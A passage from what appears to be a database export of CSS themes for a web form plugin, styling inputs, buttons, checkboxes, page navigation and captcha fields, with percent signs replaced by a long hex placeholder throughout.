80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffcd72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #e8a467 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffcd72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #e8a467 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffcd72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 10px 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFD9B8;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFB471;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF983C; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f6a965 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f6a965 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff983c 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f6a965), color-stop(67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f6a965), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff983c)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f6a965 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f6a965 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff983c 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f6a965 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f6a965 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff983c 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f6a965 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f6a965 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff983c 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #f6a965 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f6a965 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff983c 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #FFD9B8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #FF983D;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #e4e4e4), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(36,'Theme 10 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D1E0F0;\r\nborder: 1px solid #075DA4;\r\nmargin-bottom: 10px;\r\ncolor: #075DA4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/02/next_hoverbg.png) url([SITE_ROOT]/images/01/02/previous_hover.png) url([SITE_ROOT]/images/01/02/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	content: \"\";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/02/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #035192 ;\r\nbackground: -moz-linear-gradient(left, #035192 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #035192 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #035192 ), color-stop(20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 ), color-stop(80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #035192 ));\r\nbackground: -webkit-linear-gradient(left, #035192 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #035192 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(left, #035192 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #035192 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(left, #035192 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0860A9 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #035192 